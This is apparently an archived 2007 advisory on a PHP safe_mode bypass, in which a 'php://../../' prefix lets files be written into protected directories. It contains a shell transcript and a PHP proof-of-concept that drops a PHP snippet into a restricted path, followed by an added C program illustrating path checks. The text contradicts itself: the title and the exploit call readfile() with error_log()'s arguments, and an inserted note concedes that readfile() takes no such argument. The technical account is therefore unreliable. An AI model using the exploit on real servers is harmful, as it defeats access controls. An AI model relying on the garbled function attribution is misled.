SECURITYVULNS:DOC:16511
Mar 29, 2007

readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4

vulners.com

SecurityRisk : DEN
Remote Exploit : No
Local Exploit : Yes
Exploit Given : Yes
Credit : The-WolF-kSA
Date : 24.3.2007

Affected Software : PHP 5.2.1/ 5.1.6 / 4.4.4

[readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4]

Author: ThE-WoLf-KsA
Date:
- Written: 24.3.2007

--- 0. Description ---

readfile() in PHP 5.2.1 / 5.1.6 / 4.4.4 can be made to create a file inside a directory that safe_mode would otherwise refuse, by prefixing the destination with a stream scheme and "../../" (local exploit, PoC below).

--- 1. readfile() Safe Mode Bypass ---

readfile() reads a file through and displays its contents, or, with option 3 below, writes into a file. The issue is very simple: readfile() checks safe_mode and open_basedir in the stream functions, but the call is not allowed to use URLs, and the problem lies in an incorrectly handled filename.

PHP5:

--- lines 2013-2050 ---
PHPAPI int _php_readfile(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
{
    php_stream *stream = NULL;

    switch (opt_err) {

        case 1:     /* send an email */
            {
#if HAVE_SENDMAIL
                if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
                    return FAILURE;
                }
#else
                php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
                return FAILURE;
#endif
            }
            break;

        case 2:     /* send to an address */
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
            return FAILURE;
            break;

        case 3:     /* save to a file */
            stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
            if (!stream)
                return FAILURE;
            php_stream_write(stream, message, strlen(message));
            php_stream_close(stream);
            break;

        default:
            php_log_err(message TSRMLS_CC);
            break;
    }
    return SUCCESS;
}
--- lines 2013-2050 ---

Let's look at option 3.

--- line 2038 ---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
--- line 2038 ---

Mode "a" opens the file for appending and creates it if it does not exist.
The problem is that php_stream_open_wrapper() is called with IGNORE_URL.
IGNORE_URL does not switch safe_mode off by itself: it tells the stream
layer not to treat the string as a URL, so no wrapper lookup is done and
the whole string is handed to the plain-file opener as an ordinary path.
A destination of the form "prefix://../../" is then accepted where the bare
path is refused, and the file is created at the real location.

Note on the calls below: readfile() takes (filename, use_include_path,
context). The three-argument calls (message, 3, destination) follow
error_log(message, message_type, destination, extra_headers), and the
listing above is error_log()'s implementation (the mail subject "PHP
error_log message" and the php_log_err() fallback identify it), so the
reproduction goes through error_log() with message_type 3; readfile()
itself has no such argument.

--- Example ---
cxib# php -r 'readfile("<? echo \"cx\"; ?>", 3, "/www/temp/sr.php");'

Warning: readfile(): SAFE MODE Restriction in effect. The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1

Warning: readfile(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1
cxib# php -r 'readfile("<? echo \"cx\"; ?>", 3, "php://../../www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
-rw-r--r--  1 cxib  www  16 Jun 11 17:47 /www/temp/sr.php
cxib#
--- Example ---
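Why a scheme in front of "../../" reaches the protected directory is plain path arithmetic once the string is no longer treated as a URL: "php:" becomes the first component of a relative path and the two ".." walk back out of it, so the write lands on /www/temp/sr.php as in the transcript. The C program below is an added illustration, not code from the advisory or from PHP. lexical_resolve() and dest_allowed() are hypothetical helpers: the first models that arithmetic (assuming the shell's working directory is "/"), the second shows the check a file-writing routine should apply to the resolved path rather than to the raw string.

```c
#include <stdio.h>
#include <string.h>

#define PATH_CAP  1024
#define MAX_PARTS 256

/* Hypothetical helper (not PHP's own code): resolve `path` against `cwd`
 * purely lexically, collapsing ".", ".." and empty components without
 * touching the filesystem. Returns `out` on success, NULL if a buffer would
 * overflow. `cwd` must be absolute. A relative string such as
 * "php://../../x" is appended to cwd, so "php:" is just its first component. */
static char *lexical_resolve(const char *cwd, const char *path, char *out, size_t cap)
{
    char buf[PATH_CAP];
    char *parts[MAX_PARTS];
    size_t n = 0, used = 0;
    int len;

    if (path[0] == '/')
        len = snprintf(buf, sizeof buf, "%s", path);
    else
        len = snprintf(buf, sizeof buf, "%s/%s", cwd, path);
    if (len < 0 || (size_t)len >= sizeof buf)
        return NULL;

    /* Split on '/'; strtok drops the empty components produced by "//". */
    for (char *tok = strtok(buf, "/"); tok; tok = strtok(NULL, "/")) {
        if (strcmp(tok, ".") == 0)
            continue;
        if (strcmp(tok, "..") == 0) {
            if (n > 0)
                n--;            /* walk up; at "/" there is nowhere to go */
            continue;
        }
        if (n == MAX_PARTS)
            return NULL;
        parts[n++] = tok;
    }

    /* Reassemble as an absolute path. */
    if (n == 0) {
        if (cap < 2)
            return NULL;
        strcpy(out, "/");
        return out;
    }
    for (size_t i = 0; i < n; i++) {
        size_t plen = strlen(parts[i]);
        if (used + 1 + plen + 1 > cap)
            return NULL;
        out[used++] = '/';
        memcpy(out + used, parts[i], plen + 1);
        used += plen;
    }
    return out;
}

/* Hypothetical policy check: accept a destination only if the *resolved*
 * path lies under `root`. A check on the raw string (prefix match, or a
 * stat() of the literal text) is exactly what "scheme://../../" evades. */
static int dest_allowed(const char *cwd, const char *raw, const char *root)
{
    char resolved[PATH_CAP];
    size_t rl = strlen(root);

    /* A string about to be opened as a plain file has no business carrying
     * a scheme; refuse it before any path arithmetic. */
    if (strstr(raw, "://"))
        return 0;
    if (!lexical_resolve(cwd, raw, resolved, sizeof resolved))
        return 0;
    if (strcmp(root, "/") == 0)
        return 1;
    if (strncmp(resolved, root, rl) != 0)
        return 0;
    return resolved[rl] == '/' || resolved[rl] == '\0';
}

int main(void)
{
    /* The advisory's destinations, resolved from the assumed cwd "/". */
    static const char *samples[] = {
        "/www/temp/sr.php",
        "php://../../www/temp/sr.php",
        "file://../../etc/passwd",
    };
    char out[PATH_CAP];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        const char *r = lexical_resolve("/", samples[i], out, sizeof out);
        printf("%-30s -> %-20s allowed under /www/logs: %s\n", samples[i],
               r ? r : "(overflow)",
               dest_allowed("/", samples[i], "/www/logs") ? "yes" : "no");
    }
    return 0;
}
```

The point of dest_allowed() is that the policy check (here a directory allow-list; in PHP 5.2 the safe_mode uid comparison) must look at exactly the path the open will use. A check that inspects the raw string and an open that works on the normalised path can be separated by nothing more than a bogus leading component, which is what the "php://" prefix supplies.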

--- 2. Exploit ---
<?php
$file = ""; # FILENAME: path of the file to create (a location safe_mode would otherwise refuse)
readfile("<? echo \"cx\"; ?>", 3, "php://../../" . $file);
?>

--- 4. Greets ---
SniPer_hex

--- 5. Contact ---
[email protected]

milw0rm.com [2007-03-25]